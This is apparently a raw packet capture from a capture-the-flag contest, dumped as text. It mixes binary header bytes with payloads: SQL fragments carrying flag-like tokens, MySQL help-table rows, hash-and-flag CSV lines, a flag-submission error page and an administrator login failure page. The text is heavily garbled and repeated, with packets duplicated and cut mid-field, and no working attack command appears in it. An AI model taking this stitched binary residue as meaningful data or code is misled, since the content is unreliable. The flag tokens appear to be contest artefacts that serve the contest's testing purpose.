_)17272362'),(362870354,'pVXt4Y5',2417,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','29849801'),(77909691,'ybxFzq3nw',3525,'MTNzEwEJABL3Jl1LJdstdnlbQAL+WEoDLKAJVw==','27265109'),(266032309,'T0uuLrkhuyb',3540,'MTNzEwEJABNNV6v6PDzfODq1nrYXnirCL2wCqA==','16853970'),(324440356,'MZzyTY',786,'MTNzEwEJABSu2yxPwyAIJM67ViZbopXP/jfCcQ==','34226985'),(137173338,'Vbid4DPfTcz',4109,'MTNzExEJADCiLPQon0teeewYjkRfziOGX/1DhQ==','17669797'),(834994030,'1',1,'1','1'),(233294773,'5RwVUwJp',2558,'MTNzExEJADF7RhOEu3aTE4sBIaBHZU9ptczf0Q==','39175280'),(29942851,'zYBqcRosnfA',1960,'MTNzExEJADJ5XSFEnyZfzhUA2LRGGQ+GAveu1Q==','29329539'),(139295855,'fbMWymzI',2749,'MTNzExEJADPrsD+e0Gt2N6DDTcC/p/juFZpI2g==','25697572'),(977741268,'R86Wr2',4064,'MTNzExEJADRSwuCS0VSmwTdjipmkx1T0xI0DPw==','24805698'),(651364602,'nTz6Cx',615,'MTNzExEJADUhPPlIOyJ7NeqGtZ05f/tGqorPiA==','26765832'),(628790650,'2QJSJpZH',3610,'MTNzExEJADas1n6OBzGG8pvmbh3ZSHjLgktEkA==','13700268'),(274662051,'tKhysZLzw',4845,'MTNzExEJADepDtoKLy3C7UyQ2IlA+6Nxs48/UA==','23545622'),(566514464,'RxEz9paEZ5',2137,'MTNzExEJADhXwXxWf4VttRsZhfp8t2mRDr8Zmg==','25771219'),(404384701,'2FyPHzwOXp',1667,'MTNzExEJADn4XSmuavS7Kc0Y2vMONGKOS65CmA==','39216737'),(114397309,'KMG4AN1Rs3',4263,'MTNzExEJADpfNnMDolU4YTLMNWVW6/PDZc329w==','29664211'),(98955963,'7FeAC;9 __BiʪEQ@/o0oo0E9)@@ Pخ\h*!Ph&HTTP/1.0 200 OK CT9 bb0`BiET@/Ԁo0SE<@@i  3PZi5 Qy _)17272362'),(362870354,'pVXt4Y5',2417,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','29849801'),(77909691,'ybxFzq3nw',3525,'MTNzEwEJABL3Jl1LJdstdnlbQAL+WEoDLKAJVw==','27265109'),(266032309,'T0uuLrkhuyb',3540,'MTNzEwEJABNNV6v6PDzfODq1nrYXnirCL2wCqA==','16853970'),(324440356,'MZzyTY',786,'MTNzEwEJABSu2yxPwyAIJM67ViZbopXP/jfCcQ==','34226985'),(137173338,'Vbid4DPfTcz',4109,'MTNzExEJADCiLPQon0teeewYjkRfziOGX/1DhQ==','17669797'),(834994030,'1',1,'1','1'),(233294773,'5RwVUwJp',2558,'MTNzExEJADF7RhOEu3aTE4sBIaBHZU9ptczf0Q==','39175280'),(29942851,'zYBqcRosnfA',1960,'MTNzExEJADJ5XSFEnyZfzhUA2LRGGQ+GAveu1Q==','29329539'),(139295855,'fbMWymzI',2749,'MTNzExEJADPrsD+e0Gt2N6DDTcC/p/juFZpI2g==','25697572'),(977741268,'R86Wr2',4064,'MTNzExEJADRSwuCS0VSmwTdjipmkx1T0xI0DPw==','24805698'),(651364602,'nTz6Cx',615,'MTNzExEJADUhPPlIOyJ7NeqGtZ05f/tGqorPiA==','26765832'),(628790650,'2QJSJpZH',3610,'MTNzExEJADas1n6OBzGG8pvmbh3ZSHjLgktEkA==','13700268'),(274662051,'tKhysZLzw',4845,'MTNzExEJADepDtoKLy3C7UyQ2IlA+6Nxs48/UA==','23545622'),(566514464,'RxEz9paEZ5',2137,'MTNzExEJADhXwXxWf4VttRsZhfp8t2mRDr8Zmg==','25771219'),(404384701,'2FyPHzwOXp',1667,'MTNzExEJADn4XSmuavS7Kc0Y2vMONGKOS65CmA==','39216737'),(114397309,'KMG4AN1Rs3',4263,'MTNzExEJADpfNnMDolU4YTLMNWVW6/PDZc329w==','29664211'),(98955963,'7FeACg9 __0`BiEQ@/>o0xE9)@@ Pخ\h*!Ph&HTTP/1.0 200 OK C: bbBi0`ET@/,|po0E< ;@?  P2? Y ndf2,ucsb,MTNzEwEDA24N4SfbGbngfF61FAmdKErpWod86w==
D95F928901650BE61AAD6E7A16D532A6,ucsb,MTNzEwEDA28fQzfWlWNRfAaBpMGw3HIO3QxEGg==
9146776D63EC3970F727407E1AFBEAA5,ucsb,MTNzEwEDA3AwSAA9uuDv2UnqLdt527AWc6m+hA==
D8643321360EF881C4A547C121CD19BF,ucsb,MTNzEwEDA3EzWcN6wlotk5lTV47ZCUD55egUzA==
233CE4E167470E6567195C8C14822685,ucsb,MTNzEwEDA3L3VOt68jVWjjtQSpZ5X8lawXYyYQ==
8FD6E033E7961E65ACF4A669D94C6484,ucsb,MTNzEwEDA3N4T9DvIHr9C7gCALbUHdRK9IadCQ==
2F4DC4610D51FA185464454873E1ACFD,ucsb,MTNzEwEDA3TXHv1crp9HPXTYxtbIveAtYJTRLg==
D3EACD2841CAF6D67EABD72A9A62283E,ucsb,MTNzEwEDA3W0/7gzCEZ6xXiHteQxjvWmWH3lBQ==
7C52FD2DD4A10C49403F1D419D2C19D4,ucsb,MTNzEwEDA3Z7Z6ry1yTYSRKXSI6jV3dWi5Vk3g==
651533E29AFE5C2960669459177154FA,ucsb,MTNzEwEDA3cGsoPIYScEgtliWPwHc3Jkwg+oDQ==
32E58B8281BBDC7B294828402A025475,ucsb,MTNzEwEDA3joMLj50Rjph2tzKjsvcftlopQNzA==
225BC6E2035CC502FD74ADFEC1FAE751,ucsb,MTNzEwEDA3lVsw8YhZTlJeRv4/nELMyDinG1RQ==
1666BB6EE7E9D858A7E12FA7309BB3A4,ucsb,MTNzEwEDA3rZkFlZ4BTP6UaQmuKi3ZcV6qqy+Q==
BF595E75D203961FD0E881B41FFD2A2F,ucsb,MTNzEwEDA3vfmCAKVKszQhxkiGqQFlaJM7Ym/Q==
1EE1609E3F1F31E0BAA62BDC3D2B5E3B,ucsb,MTNzEwEDA3wZn+TM4Pa28+7qNvc+8Li2UfnZ2g==
3BD37607F487742DC0CA66A7BFA6268E,ucsb,MTNzEwEDA333+Z2ecH+/y8PbjGO3Gto3RmayC: bb0`BiET@/o0AE< ;@@  P2? Y ndf2,ucsb,MTNzEwEDA24N4SfbGbngfF61FAmdKErpWod86w==
D95F928901650BE61AAD6E7A16D532A6,ucsb,MTNzEwEDA28fQzfWlWNRfAaBpMGw3HIO3QxEGg==
9146776D63EC3970F727407E1AFBEAA5,ucsb,MTNzEwEDA3AwSAA9uuDv2UnqLdt527AWc6m+hA==
D8643321360EF881C4A547C121CD19BF,ucsb,MTNzEwEDA3EzWcN6wlotk5lTV47ZCUD55egUzA==
233CE4E167470E6567195C8C14822685,ucsb,MTNzEwEDA3L3VOt68jVWjjtQSpZ5X8lawXYyYQ==
8FD6E033E7961E65ACF4A669D94C6484,ucsb,MTNzEwEDA3N4T9DvIHr9C7gCALbUHdRK9IadCQ==
2F4DC4610D51FA185464454873E1ACFD,ucsb,MTNzEwEDA3TXHv1crp9HPXTYxtbIveAtYJTRLg==
D3EACD2841CAF6D67EABD72A9A62283E,ucsb,MTNzEwEDA3W0/7gzCEZ6xXiHteQxjvWmWH3lBQ==
7C52FD2DD4A10C49403F1D419D2C19D4,ucsb,MTNzEwEDA3Z7Z6ry1yTYSRKXSI6jV3dWi5Vk3g==
651533E29AFE5C2960669459177154FA,ucsb,MTNzEwEDA3cGsoPIYScEgtliWPwHc3Jkwg+oDQ==
32E58B8281BBDC7B294828402A025475,ucsb,MTNzEwEDA3joMLj50Rjph2tzKjsvcftlopQNzA==
225BC6E2035CC502FD74ADFEC1FAE751,ucsb,MTNzEwEDA3lVsw8YhZTlJeRv4/nELMyDinG1RQ==
1666BB6EE7E9D858A7E12FA7309BB3A4,ucsb,MTNzEwEDA3rZkFlZ4BTP6UaQmuKi3ZcV6qqy+Q==
BF595E75D203961FD0E881B41FFD2A2F,ucsb,MTNzEwEDA3vfmCAKVKszQhxkiGqQFlaJM7Ym/Q==
1EE1609E3F1F31E0BAA62BDC3D2B5E3B,ucsb,MTNzEwEDA3wZn+TM4Pa28+7qNvc+8Li2UfnZ2g==
3BD37607F487742DC0CA66A7BFA6268E,ucsb,MTNzEwEDA333+Z2ecH+/y8PbjGO3Gto3RmayC: bbBi0`ET@/,|po0E< <@?  P2? V ndfvw==
52FF023A604ED86B24DF10D8A1D527C2,ucsb,MTNzEwEDA37xmgzf+7cfa3PbMhnrgCa9hJvdoA==
48090120125589601CB39D3FEA9F4E4D,ucsb,MTNzEwEDA3+WKIZSp3jc1kjq+HBvtnWpUQNmQg==
2CF8009AB4EDE1AC918F3F7AEFD75E61,ucsb,MTNzEwEDA4CtoerAVXFK5QwrCWpF7imMTRGoGA==
D7E51DE11F4D989E8E31F41330BC9562,ucsb,MTNzEwEDA4HVUZpPOYnWlygfxc9auzlvwnUgaw==
F04F86BC78D726A1AF9F157FB8902D01,ucsb,MTNzEwEDA4IZ9iabTQIpLM5RkcAeZMlO/fuw/g==
2019 B37716126516262121E2004B26B2F8CF,ucsb,MTNzEwEDA4PBZh+OXalQm2yRIYwUlRb/f0AYSg==
3E24909B7756DEFA25AA6D4CD5905029,ucsb,MTNzEwEDA4R6stgU/HwT7IiU/ychzHjwEs/IKA==
0C733DB7EA8F30279BFBAD7F6D66D799,ucsb,MTNzEwEDA4XkNyGW6OsICxh+EpnFa/C6WuCLBA==
79BBD521E19D71C77C3D3B05A170B7FB,ucsb,MTNzEwEDA4ZlFK+Tv3gc1oCO/ofQtUcpwXXZ1A==
EFABDF3BD20A8B30EC315AC2BBCC535E,ucsb,MTNzEwEDA4dgnXk7SIQn0ckU2X5J0vB/hgtMVQ==
33CE7EC9BB4A79B68A98C09A6CA479E0,ucsb,MTNzEwEDA4gaGmk/X1AUGLHotma0Oi+qLNQ7Xg==
430CF401E14E8CDEB29082362E25E5D1,ucsb,MTNzEwEDA4luaAc17m9noTWuwzlwPlk2za5JwA==
CC33EEDE3633F92525C327610C4AA38B,ucsb,MTNzEwEDA4q7ZWsqeMl184w1TJYXqsM6Yh6e5w==
7F55A4704D930D2C1E017F3E1D350D83,ucsb,MTNzEwEDA4uPQzznRrzShHVCMHuhT55NgEWH3w==
99D26E58F794A6A4E3F8E8B171C75C8E,ucsb,MTNzEwEDA4zE5renH8W7lxtLlnCt05kePDLaGQ==
4FCA1567129D1F827EAD7F3DC3C: bb0`BiET@/o0AE< <@@  P2? V ndfvw==
52FF023A604ED86B24DF10D8A1D527C2,ucsb,MTNzEwEDA37xmgzf+7cfa3PbMhnrgCa9hJvdoA==
48090120125589601CB39D3FEA9F4E4D,ucsb,MTNzEwEDA3+WKIZSp3jc1kjq+HBvtnWpUQNmQg==
2CF8009AB4EDE1AC918F3F7AEFD75E61,ucsb,MTNzEwEDA4CtoerAVXFK5QwrCWpF7imMTRGoGA==
D7E51DE11F4D989E8E31F41330BC9562,ucsb,MTNzEwEDA4HVUZpPOYnWlygfxc9auzlvwnUgaw==
F04F86BC78D726A1AF9F157FB8902D01,ucsb,MTNzEwEDA4IZ9iabTQIpLM5RkcAeZMlO/fuw/g==
2019 B37716126516262121E2004B26B2F8CF,ucsb,MTNzEwEDA4PBZh+OXalQm2yRIYwUlRb/f0AYSg==
3E24909B7756DEFA25AA6D4CD5905029,ucsb,MTNzEwEDA4R6stgU/HwT7IiU/ychzHjwEs/IKA==
0C733DB7EA8F30279BFBAD7F6D66D799,ucsb,MTNzEwEDA4XkNyGW6OsICxh+EpnFa/C6WuCLBA==
79BBD521E19D71C77C3D3B05A170B7FB,ucsb,MTNzEwEDA4ZlFK+Tv3gc1oCO/ofQtUcpwXXZ1A==
EFABDF3BD20A8B30EC315AC2BBCC535E,ucsb,MTNzEwEDA4dgnXk7SIQn0ckU2X5J0vB/hgtMVQ==
33CE7EC9BB4A79B68A98C09A6CA479E0,ucsb,MTNzEwEDA4gaGmk/X1AUGLHotma0Oi+qLNQ7Xg==
430CF401E14E8CDEB29082362E25E5D1,ucsb,MTNzEwEDA4luaAc17m9noTWuwzlwPlk2za5JwA==
CC33EEDE3633F92525C327610C4AA38B,ucsb,MTNzEwEDA4q7ZWsqeMl184w1TJYXqsM6Yh6e5w==
7F55A4704D930D2C1E017F3E1D350D83,ucsb,MTNzEwEDA4uPQzznRrzShHVCMHuhT55NgEWH3w==
99D26E58F794A6A4E3F8E8B171C75C8E,ucsb,MTNzEwEDA4zE5renH8W7lxtLlnCt05kePDLaGQ==
4FCA1567129D1F827EAD7F3DC3C; bbBi0`ET@/p܂Ao0E<@?x  3Ptj o )=also : [TRUNCATE, , TRUNCATE].\n','DELETE [LOW_PRIORITY] [QUICK] [IGNORE] FROM tbl_name\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(35,'ROUND',4,' ROUND(X)\n ROUND(X,D)\nReturns the argument X, rounded to the nearest integer.\nWith two arguments, returns X rounded to D decimals.\nD can be negative to round D digits left of the decimal\npoint of the value X.\n','mysql> SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20',''),(36,'NULLIF',9,' NULLIF(expr1,expr2)\nReturns NULL if expr1 = expr2 is true, else returns expr1.\nThis is the same as CASE WHEN expr1 = expr2 THEN NULL ELSE expr1 END.\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1',''),(37,'STOP SLAVE',7,'STOP SLAVE [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads.\nSTOP SLAVE requires the SUPER privilege.\n\nLike START SLAVE, as of MySQL 4.0.2, this statement\nmay be used with the IO_THREAD and SQL_THREAD options to name\nthe thread or threads to stop.\n','',''C; ZZBi0`EL@/܂Sŀo0E4\E@?: 3 Pu}U4$YL )NC; bb0`BiET@/Ԁo0SE<@@w  3Ptj o )=also : [TRUNCATE, , TRUNCATE].\n','DELETE [LOW_PRIORITY] [QUICK] [IGNORE] FROM tbl_name\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(35,'ROUND',4,' ROUND(X)\n ROUND(X,D)\nReturns the argument X, rounded to the nearest integer.\nWith two arguments, returns X rounded to D decimals.\nD can be negative to round D digits left of the decimal\npoint of the value X.\n','mysql> SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20',''),(36,'NULLIF',9,' NULLIF(expr1,expr2)\nReturns NULL if expr1 = expr2 is true, else returns expr1.\nThis is the same as CASE WHEN expr1 = expr2 THEN NULL ELSE expr1 END.\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1',''),(37,'STOP SLAVE',7,'STOP SLAVE [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads.\nSTOP SLAVE requires the SUPER privilege.\n\nLike START SLAVE, as of MySQL 4.0.2, this statement\nmay be used with the IO_THREAD and SQL_THREAD options to name\nthe thread or threads to stop.\n','',''C; ZZ0`BiEL@/go0AE4\E@@: 3 Pu}U4$YL )NC< BiʪE@/To0oo0E)@@+ Pخ\y*!PDContent-Type: text/html CTF Flag Submission

Error submitting flag

The flag you submitted is too old.


Try again, enter your flag here:

C< 0`BiE@/CTF Flag Submission

Error submitting flag

The flag you submitted is too old.


Try again, enter your flag here:

C? bbBi0`ET@/p܂Ao0E<@?x  3Ptj 0 )=),(38,'TIMEDIFF',14,' TIMEDIFF(expr,expr2)\n\n\nTIMEDIFF() returns the time between the start time\nexpr and the end time expr2.\nexpr and expr2 are time or date-and-time expressions, but both\nmust be of the same type.\n','mysql> SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'1997-12-31 23:59:59.000001\',\n -> \'1997-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'',''),(39,'RELATED',11,' Related(g1,g2,pattern_matrix)\nReturns 1 or 0 to indicate whether or not the spatial relationship specified\nby pattern_matrix exists between g1 and g2.\nReturns -1 if the arguments are NULL.\nThe pattern matrix is a string. Its specification will be noted here if this\nfunction is implemented.\n','',''),(40,'LINEFROMTEXT',3,' LineFromText(wkt[,srid])\n LineStringFromText(wkt[,srid])\nConstructs a LINESTRING value using its WKT representation and SRID.\n','',''),(41,'SHOW MASTER STATUS',6,'SHOW MASTER STATUS\n\nProvides status information on the binary log files of the master.\n','',''),(42,'ADDTIME',14,' ADDTIME(expr,expr2)\n\n\nADDTIME() adds expr2 to expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a tC? bb0`BiET@/Ԁo0SE<@@w  3Ptj 0 )=),(38,'TIMEDIFF',14,' TIMEDIFF(expr,expr2)\n\n\nTIMEDIFF() returns the time between the start time\nexpr and the end time expr2.\nexpr and expr2 are time or date-and-time expressions, but both\nmust be of the same type.\n','mysql> SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'1997-12-31 23:59:59.000001\',\n -> \'1997-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'',''),(39,'RELATED',11,' Related(g1,g2,pattern_matrix)\nReturns 1 or 0 to indicate whether or not the spatial relationship specified\nby pattern_matrix exists between g1 and g2.\nReturns -1 if the arguments are NULL.\nThe pattern matrix is a string. Its specification will be noted here if this\nfunction is implemented.\n','',''),(40,'LINEFROMTEXT',3,' LineFromText(wkt[,srid])\n LineStringFromText(wkt[,srid])\nConstructs a LINESTRING value using its WKT representation and SRID.\n','',''),(41,'SHOW MASTER STATUS',6,'SHOW MASTER STATUS\n\nProvides status information on the binary log files of the master.\n','',''),(42,'ADDTIME',14,' ADDTIME(expr,expr2)\n\n\nADDTIME() adds expr2 to expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a tCA Bi0`E@/Nlo0E@@?F  3P</!p , y'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

CB 0`BiE@/Lo0SE@@@F  3P</!p , y'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

CkD bbBi0`ET@/p܂Ao0E<@?x  3Ptj # )=ime\nexpression.\n','mysql> SELECT ADDTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1998-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'',''),(43,'SPATIAL',24,'MySQL can create spatial indexes using syntax similar to that for creating\nregular indexes, but extended with the SPATIAL keyword.\nSpatial columns that are indexed currently must be declared NOT NULL.\nThe following examples demonstrate how to create spatial indexes.\n\n\n With CREATE TABLE:\n\nmysql> CREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g));\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom ADD SPATIAL INDEX(g);\n\n With CREATE INDEX:\n\nmysql> CREATE SPATIAL INDEX sp_index ON geom (g);\n\n\nTo drop spatial indexes, use ALTER TABLE or DROP INDEX:\n\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom DROP INDEX g;\n\n With DROP INDEX:\n\nmysql> DROP INDEX sp_index ON geom;\n\n\nExample: Suppose that a table geom contains more than 32,000 geometries,\nwhich are stored in the column g of type GEOMETRY.\nThe table also has an AUTO_INCREMENT column fid for storing\nobject ID values.\n','',''),(44,'TIMESTAMPDIFF',14,' TIMESTAMPDIFF(interval,datetime_expr1,datetime_exprCD bb0`BiET@/Ԁo0SE<@@w  3Ptj # )=ime\nexpression.\n','mysql> SELECT ADDTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1998-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'',''),(43,'SPATIAL',24,'MySQL can create spatial indexes using syntax similar to that for creating\nregular indexes, but extended with the SPATIAL keyword.\nSpatial columns that are indexed currently must be declared NOT NULL.\nThe following examples demonstrate how to create spatial indexes.\n\n\n With CREATE TABLE:\n\nmysql> CREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g));\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom ADD SPATIAL INDEX(g);\n\n With CREATE INDEX:\n\nmysql> CREATE SPATIAL INDEX sp_index ON geom (g);\n\n\nTo drop spatial indexes, use ALTER TABLE or DROP INDEX:\n\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom DROP INDEX g;\n\n With DROP INDEX:\n\nmysql> DROP INDEX sp_index ON geom;\n\n\nExample: Suppose that a table geom contains more than 32,000 geometries,\nwhich are stored in the column g of type GEOMETRY.\nThe table also has an AUTO_INCREMENT column fid for storing\nobject ID values.\n','',''),(44,'TIMESTAMPDIFF',14,' TIMESTAMPDIFF(interval,datetime_expr1,datetime_exprCE bbBi0`ET@/ԂSŀo0E<@? 3 P >c )NCF bb0`BiET@/g܀o0AE<@@ 3 P >ds )NCH bbBi0`ET@/p܂Ao0E<@?x  3Ptj  )=2)\n\nReturns the integer difference between the date or datetime expressions\ndatetime_expr1 and\ndatetime_expr2. The unit for the result is given by the\ninterval argument. The legal values for interval are the same as\nthose listed in the description of the TIMESTAMPADD() function.\n','',''),(45,'UPPER',23,' UPPER(str)\nReturns the string str with all characters changed to uppercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT UPPER(\'Hej\');\n -> \'HEJ\'',''),(46,'FROM_UNIXTIME',14,' FROM_UNIXTIME(unix_timestamp)\n FROM_UNIXTIME(unix_timestamp,format)\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS format, depending on\nwhether the function is used in a string or numeric context.\n\nmysql> SELECT FROM_UNIXTIME(875996580);\n -> \'1997-10-04 22:23:00\'\nmysql> SELECT FROM_UNIXTIME(875996580) + 0;\n -> 19971004222300\n\nIf format is given, the result is formatted according to the\nformat string. format may contain the same specifiers as\nthose listed in the entry for the DATE_FORMAT() function.\n','mysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'2003 6CH bb0`BiET@/Ԁo0SE<@@w  3Ptj  )=2)\n\nReturns the integer difference between the date or datetime expressions\ndatetime_expr1 and\ndatetime_expr2. The unit for the result is given by the\ninterval argument. The legal values for interval are the same as\nthose listed in the description of the TIMESTAMPADD() function.\n','',''),(45,'UPPER',23,' UPPER(str)\nReturns the string str with all characters changed to uppercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT UPPER(\'Hej\');\n -> \'HEJ\'',''),(46,'FROM_UNIXTIME',14,' FROM_UNIXTIME(unix_timestamp)\n FROM_UNIXTIME(unix_timestamp,format)\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS format, depending on\nwhether the function is used in a string or numeric context.\n\nmysql> SELECT FROM_UNIXTIME(875996580);\n -> \'1997-10-04 22:23:00\'\nmysql> SELECT FROM_UNIXTIME(875996580) + 0;\n -> 19971004222300\n\nIf format is given, the result is formatted according to the\nformat string. format may contain the same specifiers as\nthose listed in the entry for the DATE_FORMAT() function.\n','mysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'2003 6CK bbBi0`ET@/ԂSŀo0E<@?  Pԙ: Ji '<d 6zW7Ufog==
BB206B6625184AD630F1D9D936FEF86E,ucsb,MTNzEwEDAApJdJ/Npaeys0FGjX0klevxOrWrZw==
9D0FB3B5F2423D1383E497A4C032FFEC,ucsb,MTNzEwEDAAtb4frjJmm+NS6wT/9gOh6inLcmmw==
20C806DDE9EEB12C6AA7B2B18DD94263,ucsb,MTNzEwEDAAzj3cz3mDNQWFR7uajFiQJKlGetPg==
443AA7BB6A56DCCBA9134ACA00D1A1B5,ucsb,MTNzEwEDAA3eZNflLPWUcuK/wi7gzd9ZMd5JPQ==
BAB53940A57705C0144AB969E6DFB098,ucsb,MTNzEwEDAA5J5ooNrVoBkxG/W8OTECMPOd05Mg==
34818C9B011C356C0E4227118484EA7A,ucsb,MTNzEwEDAA8GpsrITZnl+9Jjx7aj4LZuWQNxWQ==
CDBEAF69D83CDA5B36FAE762CCAE3BB4,ucsb,MTNzEwEDABCkBabEY+lJWtFUqFEQ3IwepboZxQ==
DE14AE16653A0BF7900EF3BB01D466B4,ucsb,MTNzEwEDABE3DujGYVjA/3MpTBuiUQW050ypKA==
235C2BD7E3A50F1FF62F12C027AA0E54,ucsb,MTNzEwEDABJU1NpIy8lOftIX21ms9OPOtMYv4g==
A853E9FFB9EC292905E48E4ED9D565C7,ucsb,MTNzEwEDABPC7DLXWMdRmspqafRMROj8CPZWoA==
2B65BD2CA716C6C4F090967B6611ABC4,ucsb,MTNzEwEDABRvQ1VWu9zPZ1YBlFErWnIgR9aQgA==
141FC6BEA9B97FB4C5DDA75CF67C8D55,ucsb,MTNzEwEDABW3ckBJ0M5wSZuJ1BSfYRraOMToNw==
6D47B9679CB6FFEBDABA3C593B092172,ucsb,MTNzEwEDABbSNcfBYg1Z5Gb0lN0BTTCe8RZ7qA==
B740ABA6A8919380C1A00659D1C79124,ucsb,MTNzEwEDABcuMY+9KXx1ecwQJ9YaYMOMMNmyBQ==
E05318A53ADB9F82738AFFBED0810CA8,ucsb,MTNzEwEDABi7wyH/hM/NcWU+MkIHRk++CIpFGw==
8631E fa0 4718CFA8EF66672ACK bb0`BiET@/o0AE<@@  Pԙ: Ji '<d 6zW7Ufog==
BB206B6625184AD630F1D9D936FEF86E,ucsb,MTNzEwEDAApJdJ/Npaeys0FGjX0klevxOrWrZw==
9D0FB3B5F2423D1383E497A4C032FFEC,ucsb,MTNzEwEDAAtb4frjJmm+NS6wT/9gOh6inLcmmw==
20C806DDE9EEB12C6AA7B2B18DD94263,ucsb,MTNzEwEDAAzj3cz3mDNQWFR7uajFiQJKlGetPg==
443AA7BB6A56DCCBA9134ACA00D1A1B5,ucsb,MTNzEwEDAA3eZNflLPWUcuK/wi7gzd9ZMd5JPQ==
BAB53940A57705C0144AB969E6DFB098,ucsb,MTNzEwEDAA5J5ooNrVoBkxG/W8OTECMPOd05Mg==
34818C9B011C356C0E4227118484EA7A,ucsb,MTNzEwEDAA8GpsrITZnl+9Jjx7aj4LZuWQNxWQ==
CDBEAF69D83CDA5B36FAE762CCAE3BB4,ucsb,MTNzEwEDABCkBabEY+lJWtFUqFEQ3IwepboZxQ==
DE14AE16653A0BF7900EF3BB01D466B4,ucsb,MTNzEwEDABE3DujGYVjA/3MpTBuiUQW050ypKA==
235C2BD7E3A50F1FF62F12C027AA0E54,ucsb,MTNzEwEDABJU1NpIy8lOftIX21ms9OPOtMYv4g==
A853E9FFB9EC292905E48E4ED9D565C7,ucsb,MTNzEwEDABPC7DLXWMdRmspqafRMROj8CPZWoA==
2B65BD2CA716C6C4F090967B6611ABC4,ucsb,MTNzEwEDABRvQ1VWu9zPZ1YBlFErWnIgR9aQgA==
141FC6BEA9B97FB4C5DDA75CF67C8D55,ucsb,MTNzEwEDABW3ckBJ0M5wSZuJ1BSfYRraOMToNw==
6D47B9679CB6FFEBDABA3C593B092172,ucsb,MTNzEwEDABbSNcfBYg1Z5Gb0lN0BTTCe8RZ7qA==
B740ABA6A8919380C1A00659D1C79124,ucsb,MTNzEwEDABcuMY+9KXx1ecwQJ9YaYMOMMNmyBQ==
E05318A53ADB9F82738AFFBED0810CA8,ucsb,MTNzEwEDABi7wyH/hM/NcWU+MkIHRk++CIpFGw==
8631E fa0 4718CFA8EF66672ACL bbBi0`ET@/ԂSŀo0E<@?  Pԙ: Q '<d 1572D89077E,ucsb,MTNzEwEDABkXN6rFA7+obUwCykKP1/iEX27FmA==
398A55552AE3CD480086FD7464083E51,ucsb,MTNzEwEDABqayREx95cmtSQ+tjUX7CPdcuVVgQ==
F813A562CCDFEF404A954AFB07265DD3,ucsb,MTNzEwEDABvMmVkWeNjHdpfgSU2DQ30rlUhH5w==
ACFA8F2FEF458C3077E4DE1DA8EC54A5,ucsb,MTNzEwEDABzIiMDMZFAA7Uhp5ieDWi7etdpTAg==
80C0E14C98EC26F8A549154E6C30B465,ucsb,MTNzEwEDAB1xZ9+jWJVO792AbSToHe/8o4dUHQ==
CB4CEB3F7E8D397AA490A4DE9D067287,ucsb,MTNzEwEDAB4MunJOHC0bSsJ/hXOmTwclj4SZPw==
